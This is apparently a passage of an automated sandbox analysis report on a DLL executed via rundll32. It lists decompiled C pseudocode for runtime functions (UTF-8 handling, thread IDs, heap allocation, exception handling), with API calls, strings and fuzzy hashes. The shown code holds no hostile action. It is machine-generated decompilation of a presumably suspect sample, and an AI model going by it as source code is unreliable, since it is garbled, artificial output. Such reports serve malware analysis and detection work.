												_t158 =  &(_t158[1]);
												_t86 = L6ECD2730(_t96,  &_v48, _t133, _t135);
												_t97 = _t125;
												L28:
												_push(_t97);
												_push(_t86);
												_t57 = L6ECD2470(_t97, _t135, _t133, _t133, _t135);
												_t158 =  &(_t158[2]);
												goto L9;
											}
										}
									}
								} else {
									__eflags = _t57 - 4;
									if(_t57 >= 4) {
										E6ECE99A0("Unexpected number of bytes for incomplete UTF-8 codepoint.C:hblnvdkuwjldwqihlnxtdgmpotoebajfmrqgmtnnutixvbqajdevcxgcqgdhsiilwcvdkgzorjjpjapcqyybtuxulzftbxrvddihohqaoiyqfmhasplljpbebhbcelwx", 0x3a, 0x6ed1086c);
										_t158 =  &(_t158[1]);
										asm("ud2");
										L42:
										_t61 = E6ECE94E0(_t96,  &M6ED0FBBA, 0x23, _t133, _t135, __eflags, 0x6ed0fc64);
										_t158 =  &(_t158[1]);
										asm("ud2");
										goto L43;
									} else {
										_t110 =  *_t96;
										_t155 = _a8;
										__eflags = (_t110 & 0x000000c0) - 0x80;
										if((_t110 & 0x000000c0) != 0x80) {
											_a4 = 0;
											goto L24;
										} else {
											_t155[_t57] = _t110;
											_t112 = _a4 + 1;
											_a4 = _t112;
											_t57 =  *_t155 & 0x000000ff;
											_t96 =  *(_t57 + 0x6ed0f570) & 0x000000ff;
											__eflags = _t96 - _t112;
											_v24 = _t96;
											if(_t96 <= _t112) {
												_t61 = _t112 & 0x000000ff;
												__eflags = _t112 - 5;
												if(__eflags >= 0) {
													L43:
													_t100 = _t61;
													_t118 = 4;
													_push(0x6ed108d4);
													L45:
													E6ECE9470(_t96, _t100, _t118, _t133, _t135, __eflags);
													_t160 =  &(_t158[1]);
													asm("ud2");
													goto L46;
												} else {
													_push(_t61);
													_t57 = E6ECC3650( &_v60, _t155);
													_t158 =  &(_t158[1]);
													__eflags = _v60 - 1;
													_a4 = 0;
													if(_v60 == 1) {
														L24:
														_t135[2] = 0x6ed108cc;
														_t135[1] = 0x1502;
														goto L8;
													} else {
														_t114 = _v52;
														_t91 = _v56;
														__eflags = _t114 - _t96;
														 *_t158 = _t114;
														if(_t114 != _t96) {
															L46:
															_t101 =  &_v24;
															_t119 = _t160;
															_v48 = 0;
															_push(0x6ed108e4);
															_push( &_v48);
															goto L48;
														} else {
															_t156 =  &_v48;
															_push(_t96);
															_push(_t91);
															L6ECD2470(_t96, _t156, _t133, _t133, _t135);
															_t160 =  &(_t158[2]);
															__eflags = _v48 - 1;
															if(_v48 != 1) {
																_t93 = _v44;
																 *_t160 = _t96;
																__eflags = _t93 - _t96;
																_v20 = _t93;
																if(_t93 != _t96) {
																	_t101 =  &_v20;
																	_t119 = _t160;
																	_v48 = 0;
																	_push(0x6ed108f4);
																	_push(_t156);
																	L48:
																	E6ECE9AB0(_t96, _t101, _t119, _t133);
																	asm("ud2");
																	L50();
																	_t120 = _t135;
																	__eflags = _t101 - 0x46a;
																	if(_t101 > 0x46a) {
																		__eflags = _t101 - 0x271c;
																		if(_t101 <= 0x271c) {
																			__eflags = _t101 - 0x1715;
																			if(_t101 > 0x1715) {
																				__eflags = _t101 - 0x1f4d;
																				if(_t101 > 0x1f4d) {
																					__eflags = _t101 - 0x1f4e;
																					if(_t101 == 0x1f4e) {
																						goto L93;
																					} else {
																						__eflags = _t101 - 0x2022;
																						if(_t101 == 0x2022) {
																							goto L93;
																						} else {
																							__eflags = _t101 - 0x25e9;
																							if(_t101 != 0x25e9) {
																								goto L106;
																							} else {
																								goto L93;
																							}
																						}
																					}
																				} else {
																					__eflags = _t101 - 0x1716;
																					if(_t101 == 0x1716) {
																						goto L93;
																					} else {
																						__eflags = _t101 - 0x1b64;
																						if(_t101 == 0x1b64) {
																							goto L93;
																						} else {
																							__eflags = _t101 - 0x1b80;
																							if(_t101 == 0x1b80) {
																								goto L93;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				}
																			} else {
																				__eflags = _t101 - 0x4cf;
																				if(_t101 > 0x4cf) {
																					__eflags = _t101 - 0x4d0;
																					if(_t101 == 0x4d0) {
																						return 4;
																					} else {
																						__eflags = _t101 - 0x50f;
																						if(_t101 == 0x50f) {
																							return 0x1a;
																						} else {
																							__eflags = _t101 - 0x5b4;
																							if(_t101 == 0x5b4) {
																								goto L93;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				} else {
																					__eflags = _t101 - 0x46b;
																					if(_t101 == 0x46b) {
																						return 0x1e;
																					} else {
																						__eflags = _t101 - 0x476;
																						if(_t101 == 0x476) {
																							return 0x20;
																						} else {
																							__eflags = _t101 - 0x4cf;
																							if(_t101 != 0x4cf) {
																								goto L106;
																							} else {
																								return 5;
																							}
																						}
																					}
																				}
																			}
																		} else {
																			_t144 = _t101 - 0x271d;
																			__eflags = _t144 - 0x34;
																			if(_t144 <= 0x34) {
																				goto __edx;
																			}
																			__eflags = _t101 - 0x3c2a - 2;
																			if(_t101 - 0x3c2a < 2) {
																				goto L93;
																			} else {
																				__eflags = _t101 - 0x35ed;
																				if(_t101 == 0x35ed) {
																					goto L93;
																				} else {
																					goto L106;
																				}
																			}
																		}
																	} else {
																		__eflags = _t101 - 0xb6;
																		if(_t101 > 0xb6) {
																			__eflags = _t101 - 0x10a;
																			if(_t101 <= 0x10a) {
																				__eflags = _t101 - 0xde;
																				if(_t101 <= 0xde) {
																					__eflags = _t101 - 0xb7;
																					if(_t101 == 0xb7) {
																						return 0xc;
																					} else {
																						__eflags = _t101 - 0xce;
																						if(_t101 != 0xce) {
																							goto L106;
																						} else {
																							return 0x21;
																						}
																					}
																				} else {
																					__eflags = _t101 - 0xdf;
																					if(_t101 == 0xdf) {
																						return 0x1b;
																					} else {
																						__eflags = _t101 - 0xe8;
																						if(_t101 == 0xe8) {
																							return 0xb;
																						} else {
																							__eflags = _t101 - 0x102;
																							if(_t101 == 0x102) {
																								goto L93;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				}
																			} else {
																				__eflags = _t101 - 0x3e2;
																				if(_t101 > 0x3e2) {
																					__eflags = _t101 - 0x3e3;
																					if(_t101 == 0x3e3) {
																						goto L93;
																					} else {
																						__eflags = _t101 - 0x41d;
																						if(_t101 == 0x41d) {
																							goto L93;
																						} else {
																							__eflags = _t101 - 0x461;
																							if(_t101 == 0x461) {
																								goto L93;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				} else {
																					__eflags = _t101 - 0x10b;
																					if(_t101 == 0x10b) {
																						return 0xe;
																					} else {
																						__eflags = _t101 - 0x150;
																						if(_t101 == 0x150) {
																							return 0xf;
																						} else {
																							__eflags = _t101 - 0x252;
																							if(_t101 == 0x252) {
																								L93:
																								return 0x16;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				}
																			}
																		} else {
																			_t101 = _t101 + 0xfffffffe;
																			__eflags = _t101 - 0xa8;
																			if(_t101 <= 0xa8) {
																				_t120 = _t120 +  *((intOrPtr*)(0x6ecd20f8 + _t101 * 4));
																				goto __edx;
																			}
																			L106:
																			return 0x28;
																		}
																	}
																} else {
																	L38:
																	_t57 = 0;
																	_t135[1] = 1;
																	 *_t135 = 0;
																	goto L9;
																}
															} else {
																asm("movsd xmm0, [esp+0x14]");
																asm("movsd [esi+0x4], xmm0");
																L40:
																_t57 = 1;
																 *_t135 = 1;
																goto L9;
															}
														}
													}
												}
											} else {
												_t135[1] = 1;
												L5:
												 *_t135 = 0;
												goto L9;
											}
										}
									}
								}
							}
						} else {
							_t57 = GetLastError();
							L7:
							_t135[1] = 0;
							_t135[2] = _t57;
							L8:
							 *_t135 = 1;
							L9:
							return _t57;
						}
					}
				}
			}

APIs

GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,?,?,?,6ECD1A7E,?), ref: 6ECD1C05
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,6ECD1A7E,?), ref: 6ECD1C16
GetConsoleMode.KERNEL32(00000000,?), ref: 6ECD1C58
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 6ECD1CD3
GetLastError.KERNEL32(?,?,?,00000000), ref: 6ECD1D55

Strings

assertion failed: !handle.is_null()C:dhidzhitbujbfqqncawhogkkniegcctcaffidkzeqdjseyaidkczyyqaglapgqobugufdomajsuqnpsbinwfvrqqdagbgthjkpsvdrffbyloxsjdadyxwklhzxnssljgptb, xrefs: 6ECD1E5E
Unexpected number of bytes for incomplete UTF-8 codepoint.C:hblnvdkuwjldwqihlnxtdgmpotoebajfmrqgmtnnutixvbqajdevcxgcqgdhsiilwcvdkgzorjjpjapcqyybtuxulzftbxrvddihohqaoiyqfmhasplljpbebhbcelwx, xrefs: 6ECD1E45

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: ErrorLast$ConsoleFileHandleModeWrite
String ID: Unexpected number of bytes for incomplete UTF-8 codepoint.C:hblnvdkuwjldwqihlnxtdgmpotoebajfmrqgmtnnutixvbqajdevcxgcqgdhsiilwcvdkgzorjjpjapcqyybtuxulzftbxrvddihohqaoiyqfmhasplljpbebhbcelwx$assertion failed: !handle.is_null()C:dhidzhitbujbfqqncawhogkkniegcctcaffidkzeqdjseyaidkczyyqaglapgqobugufdomajsuqnpsbinwfvrqqdagbgthjkpsvdrffbyloxsjdadyxwklhzxnssljgptb
API String ID: 4172320683-1866377508
Opcode ID: 07e341d365b9c6b8543f9afc8d81cf65bae616c6383f23229893292852d08292
Instruction ID: 51bd62e13f2b8e4f412f90848c4dfec3ca8dc9f40712b1481bac164e9e54b025
Opcode Fuzzy Hash: 07e341d365b9c6b8543f9afc8d81cf65bae616c6383f23229893292852d08292
Instruction Fuzzy Hash: 4F71E5706083459FD3149FA9D4547AB7BE9BB86348F10882DE5E68B384F732D94CCB52

Uniqueness

Uniqueness Score: -1.00%

Function 6ECCC4D0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 95
memoryCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E6ECCC4D0(void* __ebx, void* __edi, void* __esi, void* _a8) {
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				char _v40;
				long _v48;
				void* __ebp;
				void* _t22;
				void* _t29;
				void* _t30;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				void* _t54;

				_t32 = __ebx;
				_v32 = _t54 - 0x20;
				_v20 = 0xffffffff;
				_v24 = E6ECD3990;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_v48 = 0;
				__imp__AcquireSRWLockExclusive(0x6ed1e108, __esi, __edi, __ebx);
				_t47 =  *0x6ed1d038; // 0x1
				_t50 =  *0x6ed1d03c; // 0x0
				_v40 = 0x6ed1e108;
				_t43 = _t47 & _t50;
				if(_t43 == 0xffffffff) {
					L8:
					_v36 = _t43;
					__imp__ReleaseSRWLockExclusive(0x6ed1e108);
					_v20 = 0;
					_t22 = E6ECE99A0("failed to generate unique thread ID: bitspace exhausted", 0x37, 0x6ed0fa80);
					goto L10;
				} else {
					 *0x6ed1d038 = _t47 + 1;
					asm("adc ecx, 0x0");
					 *0x6ed1d03c = _t50;
					if((_t47 | _t50) == 0) {
						_v36 = _t43;
						_v20 = 0;
						_t22 = E6ECE94E0(__ebx, "called `Option::unwrap()` on a `None` value", 0x2b, _t47, _t50, __eflags, 0x6ed0fa90);
						L10:
						asm("ud2");
						__eflags = _v36 - 0xffffffff;
						if(_v36 != 0xffffffff) {
							E6ECCC6B0(_t22,  &_v40);
						}
						return E6ECCC690( &_v48);
					} else {
						__imp__ReleaseSRWLockExclusive(0x6ed1e108);
						_t29 =  *0x6ed1e128; // 0xc40000
						if(_t29 != 0) {
							L5:
							_t30 = HeapAlloc(_t29, 0, 0x20);
							if(_t30 == 0) {
								goto L7;
							} else {
								 *(_t30 + 8) = _t47;
								 *(_t30 + 0xc) = _t50;
								 *(_t30 + 0x10) = 0;
								 *((char*)(_t30 + 0x18)) = 0;
								 *_t30 = 1;
								 *(_t30 + 4) = 1;
								 *[fs:0x0] = _v28;
								return _t30;
							}
						} else {
							_t29 = GetProcessHeap();
							if(_t29 == 0) {
								L7:
								_t43 = 8;
								E6ECE92F0(_t32, 0x20, 8, _t47, _t50, __eflags);
								asm("ud2");
								goto L8;
							} else {
								 *0x6ed1e128 = _t29;
								goto L5;
							}
						}
					}
				}
			}

APIs

AcquireSRWLockExclusive.KERNEL32(6ED1E108), ref: 6ECCC509
ReleaseSRWLockExclusive.KERNEL32(6ED1E108), ref: 6ECCC553
GetProcessHeap.KERNEL32 ref: 6ECCC562
HeapAlloc.KERNEL32(00C40000,00000000,00000020), ref: 6ECCC575
ReleaseSRWLockExclusive.KERNEL32(6ED1E108), ref: 6ECCC5C7

Strings

failed to generate unique thread ID: bitspace exhausted, xrefs: 6ECCC5D4
called `Option::unwrap()` on a `None` value, xrefs: 6ECCC5F7

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: ExclusiveLock$HeapRelease$AcquireAllocProcess
String ID: called `Option::unwrap()` on a `None` value$failed to generate unique thread ID: bitspace exhausted
API String ID: 1780889587-1657987152
Opcode ID: 94f78df136a16d380f70b278f3954ddb1ad2c04c966b9f6377ff1a6fea83f0ab
Instruction ID: caf0adce650e4ec73b6d0c9679ecb532b488480f5c500da24efe51c2df04dd86
Opcode Fuzzy Hash: 94f78df136a16d380f70b278f3954ddb1ad2c04c966b9f6377ff1a6fea83f0ab
Instruction Fuzzy Hash: B031E3B0D002048FEB10CFD5C819BEDBBB4EB89724F144129D815AF7C0E775994ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6ECC10A0, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 141
memoryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E6ECC10A0(long __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, char _a8, intOrPtr _a16) {
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				long _v44;
				long _v48;
				void* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				long _v64;
				void* __ebp;
				void* _t45;
				void* _t46;
				void* _t50;
				void* _t51;
				intOrPtr _t54;
				long _t62;
				void* _t71;
				void* _t81;
				void* _t84;
				intOrPtr _t85;

				_t78 = __esi;
				_t76 = __edi;
				_t59 = __ebx;
				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t85 = _t84 - 0x30;
				_v32 = _t85;
				_v20 = 0xffffffff;
				_v24 = E6ECD3950;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_t45 =  *0x6ed1e128; // 0xc40000
				if(_t45 != 0) {
					L3:
					_t46 = HeapAlloc(_t45, 0, 0xf);
					if(_t46 == 0) {
						goto L18;
					} else {
						asm("movsd xmm0, [0x6ed0da37]");
						asm("movsd xmm1, [0x6ed0da30]");
						_v40 = _t46;
						asm("movsd [eax+0x7], xmm0");
						asm("movsd [eax], xmm1");
						_t50 =  *0x6ed1e128; // 0xc40000
						if(_t50 != 0) {
							L7:
							_t51 = HeapAlloc(_t50, 0, 0x10);
							if(_t51 == 0) {
								goto L19;
							} else {
								asm("movsd xmm0, [0x6ed0da47]");
								asm("movsd xmm1, [0x6ed0da3f]");
								_t71 = 0;
								_t59 = 0x10;
								_v52 = _t51;
								_v48 = 0x10;
								asm("movsd [eax+0x8], xmm0");
								asm("movsd [eax], xmm1");
								while(1) {
									_v44 = _t59;
									if(_t71 > 0xf) {
										break;
									}
									_t17 = _t71 + 1; // 0x1
									_t76 = _t71 + _t17;
									_t78 = _t59 - _t76;
									if(_t78 < 0) {
										_v20 = 0;
										E6ECE9300(_t59, _t76, _t59, _t76, _t78, __eflags);
										asm("ud2");
										goto L18;
									} else {
										if(_t59 == _v48) {
											_v36 = _t71;
											_v56 = _t78;
											_v60 = _t76;
											_v20 = 0;
											_v64 = _t59;
											E6ECE9280( &_v52, _t59);
											_t51 = _v52;
											_t59 = _v64;
											_t71 = _v36;
											_t76 = _v60;
											_t78 = _v56;
										}
										_t10 = _t76 + 1; // 0x1
										_v36 = _t71 + 1;
										_t81 = _t51;
										E6ECDD4D0(_t51 + _t10, _t51 + _t76, _t78);
										_t71 = _v36;
										_t51 = _t81;
										_t85 = _t85 + 0xc;
										 *((char*)(_t81 + _t76)) = 0;
										_t59 = _t59 + 1;
										continue;
									}
									goto L21;
								}
								_v20 = 0;
								_v36 = _t51;
								E6ECDBE30(_v40, _a4, _a8, _t51, _a16);
								__eflags = _v48;
								if(_v48 != 0) {
									HeapFree( *0x6ed1e128, 0, _v36);
								}
								HeapFree( *0x6ed1e128, 0, _v40);
								_t54 = _v28;
								 *[fs:0x0] = _t54;
								return _t54;
							}
						} else {
							_t50 = GetProcessHeap();
							if(_t50 == 0) {
								L19:
								_t62 = 0x10;
								goto L20;
							} else {
								 *0x6ed1e128 = _t50;
								goto L7;
							}
						}
					}
				} else {
					_t45 = GetProcessHeap();
					if(_t45 == 0) {
						L18:
						_t62 = 0xf;
						L20:
						E6ECE92F0(_t59, _t62, 1, _t76, _t78, __eflags);
						asm("ud2");
						__eflags =  &_a8;
						E6ECC1000(_v52, _v48);
						return E6ECC1000(_v40, 0xf);
					} else {
						 *0x6ed1e128 = _t45;
						goto L3;
					}
				}
				L21:
			}

APIs

GetProcessHeap.KERNEL32 ref: 6ECC10D6
HeapAlloc.KERNEL32(00C40000,00000000,0000000F), ref: 6ECC10ED
GetProcessHeap.KERNEL32(00C40000,00000000,0000000F), ref: 6ECC111F
HeapAlloc.KERNEL32(00C40000,00000000,00000010,00C40000,00000000,0000000F), ref: 6ECC1136
HeapFree.KERNEL32(00000000,?,00000000,00000010,00C40000,00000000,0000000F), ref: 6ECC120B
HeapFree.KERNEL32(00000000,?,00000000,00000010,00C40000,00000000,0000000F), ref: 6ECC121B

Strings

Control_RunDLL, xrefs: 6ECC114B
Control_RunDLL, xrefs: 6ECC1102

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: Heap$AllocFreeProcess
String ID: Control_RunDLL$Control_RunDLL
API String ID: 2113670309-2490747307
Opcode ID: 56286ad3debf0a60a9e40463cfc0458278e6779877ac2a29c0eaeeb97a8376f9
Instruction ID: 9e63ef30d344cda6ee9ce36a943f3610d59f368079f2ab12a6fd2da9cf4423fa
Opcode Fuzzy Hash: 56286ad3debf0a60a9e40463cfc0458278e6779877ac2a29c0eaeeb97a8376f9
Instruction Fuzzy Hash: 2751AFB5D006099FEB00CFEACC80BDEB7B9FF89714F104529E9056B684E775A845CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ECDEF20, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E6ECDEF20(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _t56;
				signed int _t63;
				intOrPtr _t64;
				void* _t65;
				intOrPtr* _t66;
				intOrPtr _t68;
				intOrPtr _t70;
				signed int _t71;
				signed int _t72;
				signed int _t75;
				intOrPtr* _t79;
				intOrPtr _t80;
				signed int _t84;
				char _t86;
				intOrPtr _t90;
				intOrPtr* _t91;
				signed int _t97;
				signed int _t98;
				intOrPtr _t100;
				intOrPtr _t103;
				signed int _t105;
				void* _t108;
				void* _t109;
				void* _t115;

				_t94 = __edx;
				_t79 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t79 = E6ECE9200(__ecx,  *_t79);
				_t80 = _a8;
				_t6 = _t80 + 0x10; // 0x11
				_t103 = _t6;
				_push(_t103);
				_v20 = _t103;
				_v12 =  *(_t80 + 8) ^  *0x6ed1d804;
				E6ECDEEE0(_t80, __edx, __edi, _t103,  *(_t80 + 8) ^  *0x6ed1d804);
				E6ECE021C(_a12);
				_t56 = _a4;
				_t109 = _t108 + 0x10;
				_t100 =  *((intOrPtr*)(_t80 + 0xc));
				if(( *(_t56 + 4) & 0x00000066) != 0) {
					__eflags = _t100 - 0xfffffffe;
					if(_t100 != 0xfffffffe) {
						_t94 = 0xfffffffe;
						E6ECE03A0(_t80, 0xfffffffe, _t103, 0x6ed1d804);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t56;
					_v28 = _a12;
					 *((intOrPtr*)(_t80 - 4)) =  &_v32;
					if(_t100 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t84 = _v12;
							_t63 = _t100 + (_t100 + 2) * 2;
							_t80 =  *((intOrPtr*)(_t84 + _t63 * 4));
							_t64 = _t84 + _t63 * 4;
							_t85 =  *((intOrPtr*)(_t64 + 4));
							_v24 = _t64;
							if( *((intOrPtr*)(_t64 + 4)) == 0) {
								_t86 = _v5;
								goto L7;
							} else {
								_t94 = _t103;
								_t65 = E6ECE0340(_t85, _t103);
								_t86 = 1;
								_v5 = 1;
								_t115 = _t65;
								if(_t115 < 0) {
									_v16 = 0;
									L13:
									_push(_t103);
									E6ECDEEE0(_t80, _t94, _t100, _t103, _v12);
									goto L14;
								} else {
									if(_t115 > 0) {
										_t66 = _a4;
										__eflags =  *_t66 - 0xe06d7363;
										if( *_t66 == 0xe06d7363) {
											__eflags =  *0x6ed15704;
											if(__eflags != 0) {
												_t75 = E6ECE9060(__eflags, 0x6ed15704);
												_t109 = _t109 + 4;
												__eflags = _t75;
												if(_t75 != 0) {
													_t105 =  *0x6ed15704; // 0x6ecdf131
													 *0x6ecea154(_a4, 1);
													 *_t105();
													_t103 = _v20;
													_t109 = _t109 + 8;
												}
												_t66 = _a4;
											}
										}
										_t95 = _t66;
										E6ECE0380(_t66, _a8, _t66);
										_t68 = _a8;
										__eflags =  *((intOrPtr*)(_t68 + 0xc)) - _t100;
										if( *((intOrPtr*)(_t68 + 0xc)) != _t100) {
											_t95 = _t100;
											E6ECE03A0(_t68, _t100, _t103, 0x6ed1d804);
											_t68 = _a8;
										}
										_push(_t103);
										 *((intOrPtr*)(_t68 + 0xc)) = _t80;
										E6ECDEEE0(_t80, _t95, _t100, _t103, _v12);
										E6ECE0360();
										asm("int3");
										_t70 = _v40;
										_t90 = _v36;
										__eflags = _t70 - _t90;
										if(_t70 != _t90) {
											_t91 = _t90 + 5;
											_t71 = _t70 + 5;
											__eflags = _t71;
											while(1) {
												_t97 =  *_t71;
												__eflags = _t97 -  *_t91;
												if(_t97 !=  *_t91) {
													break;
												}
												__eflags = _t97;
												if(_t97 == 0) {
													goto L24;
												} else {
													_t98 =  *((intOrPtr*)(_t71 + 1));
													__eflags = _t98 -  *((intOrPtr*)(_t91 + 1));
													if(_t98 !=  *((intOrPtr*)(_t91 + 1))) {
														break;
													} else {
														_t71 = _t71 + 2;
														_t91 = _t91 + 2;
														__eflags = _t98;
														if(_t98 != 0) {
															continue;
														} else {
															goto L24;
														}
													}
												}
												goto L32;
											}
											asm("sbb eax, eax");
											_t72 = _t71 | 0x00000001;
											__eflags = _t72;
											return _t72;
										} else {
											L24:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L32;
							L7:
							_t100 = _t80;
						} while (_t80 != 0xfffffffe);
						if(_t86 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L32:
			}

0x6ecdef20
0x6ecdef27
0x6ecdef2b
0x6ecdef2c
0x6ecdef32
0x6ecdef3e
0x6ecdef40
0x6ecdef46
0x6ecdef46
0x6ecdef4f
0x6ecdef51
0x6ecdef54
0x6ecdef57
0x6ecdef5f
0x6ecdef64
0x6ecdef67
0x6ecdef6a
0x6ecdef71
0x6ecdefcd
0x6ecdefd0
0x6ecdefd8
0x6ecdefdf
0x00000000
0x6ecdefdf
0x00000000
0x6ecdef73
0x6ecdef73
0x6ecdef79
0x6ecdef7f
0x6ecdef85
0x6ecdeff0
0x6ecdeff9
0x6ecdef87
0x6ecdef87
0x6ecdef87
0x6ecdef8d
0x6ecdef90
0x6ecdef93
0x6ecdef96
0x6ecdef99
0x6ecdef9e
0x6ecdefb4
0x00000000
0x6ecdefa0
0x6ecdefa0
0x6ecdefa2
0x6ecdefa7
0x6ecdefa9
0x6ecdefac
0x6ecdefae
0x6ecdefc4
0x6ecdefe4
0x6ecdefe4
0x6ecdefe8
0x00000000
0x6ecdefb0
0x6ecdefb0
0x6ecdeffa
0x6ecdeffd
0x6ecdf003
0x6ecdf005
0x6ecdf00c
0x6ecdf013
0x6ecdf018
0x6ecdf01b
0x6ecdf01d
0x6ecdf01f
0x6ecdf02c
0x6ecdf032
0x6ecdf034
0x6ecdf037
0x6ecdf037
0x6ecdf03a
0x6ecdf03a
0x6ecdf00c
0x6ecdf040
0x6ecdf042
0x6ecdf047
0x6ecdf04a
0x6ecdf04d
0x6ecdf055
0x6ecdf059
0x6ecdf05e
0x6ecdf05e
0x6ecdf061
0x6ecdf065
0x6ecdf068
0x6ecdf078
0x6ecdf07d
0x6ecdf081
0x6ecdf084
0x6ecdf087
0x6ecdf089
0x6ecdf08f
0x6ecdf092
0x6ecdf092
0x6ecdf095
0x6ecdf095
0x6ecdf097
0x6ecdf099
0x00000000
0x00000000
0x6ecdf09b
0x6ecdf09d
0x00000000
0x6ecdf09f
0x6ecdf09f
0x6ecdf0a2
0x6ecdf0a5
0x00000000
0x6ecdf0a7
0x6ecdf0a7
0x6ecdf0aa
0x6ecdf0ad
0x6ecdf0af
0x00000000
0x6ecdf0b1
0x00000000
0x6ecdf0b1
0x6ecdf0af
0x6ecdf0a5
0x00000000
0x6ecdf09d
0x6ecdf0b3
0x6ecdf0b5
0x6ecdf0b5
0x6ecdf0b9
0x6ecdf08b
0x6ecdf08b
0x6ecdf08b
0x6ecdf08e
0x6ecdf08e
0x6ecdefb2
0x00000000
0x6ecdefb2
0x6ecdefb0
0x6ecdefae
0x00000000
0x6ecdefb7
0x6ecdefb7
0x6ecdefb9
0x6ecdefc0
0x00000000
0x6ecdefc2
0x00000000
0x6ecdefc0
0x6ecdef85
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 6ECDEF57
___except_validate_context_record.LIBVCRUNTIME ref: 6ECDEF5F
_ValidateLocalCookies.LIBCMT ref: 6ECDEFE8
__IsNonwritableInCurrentImage.LIBCMT ref: 6ECDF013
_ValidateLocalCookies.LIBCMT ref: 6ECDF068

Strings

csm, xrefs: 6ECDEFFD

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 756435211ba0e6cdf97cac892363a5c4902293f20037f92591492c2719f28f7d
Instruction ID: 12e3ac67a350981ae2a79a22648d13aeb001d8990e963e02b1aac6b3398b669e
Opcode Fuzzy Hash: 756435211ba0e6cdf97cac892363a5c4902293f20037f92591492c2719f28f7d
Instruction Fuzzy Hash: D0416034E102199FCF00CFE9C881ADEBBB9BF45328F108555E9249B395E736E909CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6ECD2960, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111
memoryCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E6ECD2960(void* __ebx, long* __ecx, void* __edi, void* __esi, char _a8) {
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
